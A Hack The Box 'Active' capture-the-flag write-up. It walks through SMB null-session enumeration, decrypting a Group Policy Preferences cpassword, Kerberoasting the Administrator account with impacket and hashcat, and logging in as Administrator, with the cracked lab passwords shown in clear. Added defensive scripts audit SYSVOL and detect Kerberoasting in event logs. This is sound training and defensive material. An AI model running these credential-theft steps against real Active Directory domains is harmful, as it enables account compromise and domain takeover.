HTB:Active Write-Up

Cameron Grimball
4 min read · May 12, 2021

Target Machine Information:

· Hostname : ACTIVE

· IP Address : 10.10.10.100

· OS : Windows

RECON:

sudo bash nmapAutomator 10.10.10.100 Basic
# Nmap 7.91 scan initiated Tue May 11 17:21:47 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,49152,49153,49154,49155,49157,49158 -oN nmap/Basic_10.10.10.100.nmap --dns-server=1.1.1.1 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.069s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-11 21:23:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 1m51s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-11T21:24:43
|_ start_date: 2021-05-11T20:50:52
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 11 17:22:59 2021 -- 1 IP address (1 host up) scanned in 72.54 seconds

ENUMERATION:

enum4linux -a 10.10.10.100
sudo smbclient //10.10.10.100/Replication -U ""%""

After logging in with a null session we navigate to the following directory and get the Groups.xml file.

smb: \> cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)

We then go back to our attack machine to view the Groups.xml file. In the file we find an encrypted password in the “cpassword” attribute. Group Policy Preferences encrypts this value with AES, but Microsoft published the key, so anyone who can read SYSVOL can recover the plaintext.

cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

After pasting it into Google we see that we can decrypt it using gpp-decrypt.

┌──(kali㉿kali)-[~/Desktop/nmapAutomator/10.10.10.100]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

And we get the following output → GPPstillStandingStrong2k18

Also in our Groups.xml file we can see that the account this password belongs to (the userName attribute) is “SVC_TGS”.
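Because any reader of SYSVOL can pull these preference files, the defensive counterpart of this step is to audit SYSVOL for them. The following is an added example, not code from the write-up or from any tool the author used: it walks a SYSVOL-style tree for the GPP preference files known to carry a cpassword attribute and reports each one together with the account it belongs to. The sample Groups.xml and the cpassword value inside it are constructed placeholders modelled on the file found above; the policy GUID in the demo path is the Default Domain Policy GUID seen in the share listing.

```python
"""Audit a SYSVOL-style tree for Group Policy Preferences files that still carry
a cpassword attribute. Added example; not from the write-up."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that can embed credentials as a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample shaped like the Groups.xml found on the box; the cpassword
# value below is a placeholder, not a real encrypted password.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="PLACEHOLDER_BASE64_CIPHERTEXT"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_data, source="<inline>"):
    """Return one finding per element carrying a non-empty cpassword attribute.

    xml_data may be str or bytes; files are read as bytes so the parser
    handles the XML declaration and any BOM itself.
    """
    findings = []
    for elem in ET.fromstring(xml_data).iter():
        cpw = elem.attrib.get("cpassword")
        if not cpw:          # absent or already cleared: nothing stored
            continue
        # Different GPP item types name the account differently.
        account = (elem.attrib.get("userName")
                   or elem.attrib.get("accountName")
                   or elem.attrib.get("runAs")
                   or "<unknown>")
        findings.append({"file": source, "element": elem.tag,
                         "account": account, "ciphertext_len": len(cpw)})
    return findings


def scan_sysvol(root_dir):
    """Walk root_dir and collect cpassword findings from every GPP file."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root_dir):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
            except ET.ParseError as exc:
                print(f"unparseable {path}: {exc}")
    return findings


def demo_scan():
    """Build a throwaway SYSVOL-like tree holding the sample file plus a
    Drives.xml whose cpassword is empty, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        groups_dir = os.path.join(tmp, "active.htb", "Policies",
                                  "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                                  "MACHINE", "Preferences", "Groups")
        os.makedirs(groups_dir)
        with open(os.path.join(groups_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        # Empty cpassword (password removed) must not be reported.
        drives_dir = os.path.join(tmp, "active.htb", "Policies", "constructed-gpo",
                                  "USER", "Preferences", "Drives")
        os.makedirs(drives_dir)
        with open(os.path.join(drives_dir, "Drives.xml"), "w", encoding="utf-8") as fh:
            fh.write('<Drives><Drive name="H:"><Properties cpassword="" userName="" '
                     'path="\\\\dc\\home"/></Drive></Drives>')
        return scan_sysvol(tmp)


if __name__ == "__main__":
    for f in demo_scan():
        print(f"{f['file']}: <{f['element']}> account={f['account']} "
              f"ciphertext_len={f['ciphertext_len']}")
```

Point scan_sysvol at a copy of the SYSVOL share (or the Replication share seen above) to list every policy still shipping a stored password; the fix is to remove the item from the GPO and rotate the affected account, since the ciphertext is readable by every domain member.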

So with these credentials let's use smbmap to see what we have access to.

smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

We can then use smbclient to log in to the Users share and navigate to find user.txt.

smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
get user.txt
┌──(root💀kali)-[~]
└─# cat user.txt
86d67d....

PRIVILEGE ESCALATION:

Since we saw that port 88 is running Kerberos, and we now hold valid domain credentials, we can try Kerberoasting: request a service ticket for an account that has an SPN registered (here the Administrator account) and crack that ticket offline to recover the account's password.

1. Grab “GetUserSPNs.py” from the impacket examples directory and copy it somewhere you can use it.

locate GetUserSPNs.py
cp ../../GetUserSPNs.py .

2. Now let's run it.

python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPN.out

3. We get a hash:

┌──(root💀kali)-[/home/kali/Desktop/nmapAutomator/10.10.10.100]
└─# cat GetUserSPN.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$54a8d2b2ecc2b0e7133a4859603299ca$...

4. After some googling we find that the hashcat mode for a Kerberoasting hash (the $krb5tgs$23$ prefix marks RC4-HMAC, encryption type 23) is:

13100 | Kerberos 5, etype 23, TGS-REP

5. So our hashcat command is formatted like the following.

hashcat -a 0 -m 13100 GetUserSPN.out /usr/share/wordlists/rockyou.txt -O

We get our cracked hash:

hashcat -a 0 -m 13100 GetUserSPN.out /usr/share/wordlists/rockyou.txt -O --show
...c5d31:Ticketmaster1968
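On the domain controller side, every one of these ticket requests is logged as Security Event ID 4769, and the $krb5tgs$23$ prefix above corresponds to TicketEncryptionType 0x17 (RC4-HMAC) in that event. The following is an added example, not part of the write-up or of impacket/hashcat: it runs a simple Kerberoasting hunt over a handful of constructed 4769 records (field names mirror the event's EventData; the svc_backup service, the alice user, the timestamps and the 192.0.2.x addresses are made up, while the realm and the SVC_TGS/Administrator names come from the box). It flags RC4 service-ticket requests for non-krbtgt, non-computer accounts and groups them by requesting account and source address within a time window.

```python
"""Hunt for Kerberoasting in Windows Security Event ID 4769 records.
Added example; not from the write-up. Input is a list of dicts whose keys mirror
the event's EventData field names."""
from collections import defaultdict
from datetime import datetime, timedelta

# RC4-HMAC (0x17) and RC4-HMAC-EXP (0x18). 0x17 is etype 23, i.e. the
# $krb5tgs$23$ ticket format that hashcat mode 13100 cracks.
RC4_ETYPES = {"0x17", "0x18"}

# Constructed sample records (see the lead-in for which names are made up).
SAMPLE_EVENTS = [
    {"time": "2021-05-11T21:30:01", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12",
     "IpAddress": "192.0.2.10", "Status": "0x0"},
    {"time": "2021-05-11T21:30:02", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12",
     "IpAddress": "192.0.2.10", "Status": "0x0"},
    {"time": "2021-05-11T21:30:03", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "IpAddress": "192.0.2.10", "Status": "0x0"},
    {"time": "2021-05-11T21:30:04", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17",
     "IpAddress": "192.0.2.10", "Status": "0x0"},
    # Failed request: no ticket was issued, so there is nothing to crack.
    {"time": "2021-05-11T21:31:00", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "IpAddress": "192.0.2.11", "Status": "0xd"},
    # Ordinary AES ticket for a service account: not a cracking candidate.
    {"time": "2021-05-11T21:32:00", "TargetUserName": "alice@ACTIVE.HTB",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x12",
     "IpAddress": "192.0.2.20", "Status": "0x0"},
]


def is_roast_candidate(ev):
    """True for a successfully issued RC4 service ticket on a user account."""
    service = ev["ServiceName"]
    return (ev.get("Status", "0x0") == "0x0"                  # ticket issued
            and ev["TicketEncryptionType"].lower() in RC4_ETYPES
            and service.lower() != "krbtgt"                    # TGT traffic, not roasting
            and not service.endswith("$"))                     # computer accounts: random 120-char passwords


def detect_kerberoasting(events, min_services=1, window=timedelta(minutes=10)):
    """Group candidate requests by (requesting account, source IP) and alert when
    at least min_services distinct services were requested inside one window."""
    by_requester = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_requester[(ev["TargetUserName"], ev["IpAddress"])].append(ev)

    alerts = []
    for (account, ip), evs in by_requester.items():
        evs.sort(key=lambda e: e["time"])
        stamps = [datetime.fromisoformat(e["time"]) for e in evs]
        best = set()
        # Sliding window: the densest burst of distinct services decides.
        for i, start in enumerate(stamps):
            in_window = {e["ServiceName"] for e, t in zip(evs[i:], stamps[i:])
                         if t - start <= window}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_services:
            alerts.append({"account": account, "source_ip": ip,
                           "services": sorted(best), "count": len(evs)})
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoasting(SAMPLE_EVENTS):
        print(f"{a['account']} from {a['source_ip']} requested RC4 tickets for "
              f"{', '.join(a['services'])}")
```

Once AES is enforced on SPN-bearing accounts (msDS-SupportedEncryptionTypes), any remaining 0x17 request is a high-signal event; until then, raise min_services to cut noise from legacy applications. Detection only catches the request, so pair it with long random passwords or gMSAs for service accounts so that a captured ticket does not fall to a rockyou run as it did here.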

6. So now let's locate and copy impacket's smbclient.py and try to log in as Administrator.

cp /opt/impacket/examples/smbclient.py .
python3 smbclient.py Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.23.dev1+20210127.141011.3673c588 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# use Users
# ls
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 .
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 ..
drw-rw-rw- 0 Mon Jul 16 06:14:21 2018 Administrator
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 All Users
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Default
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 Default User
-rw-rw-rw- 174 Mon Jul 16 17:01:17 2018 desktop.ini
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Public
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
# cd Administrator
# cd Desktop
# get root.txt
# exit
┌──(root💀kali)-[/home/kali/Desktop/nmapAutomator/10.10.10.100]
└─# cat root.txt
b5fc76d1...

Rooted and scooted!
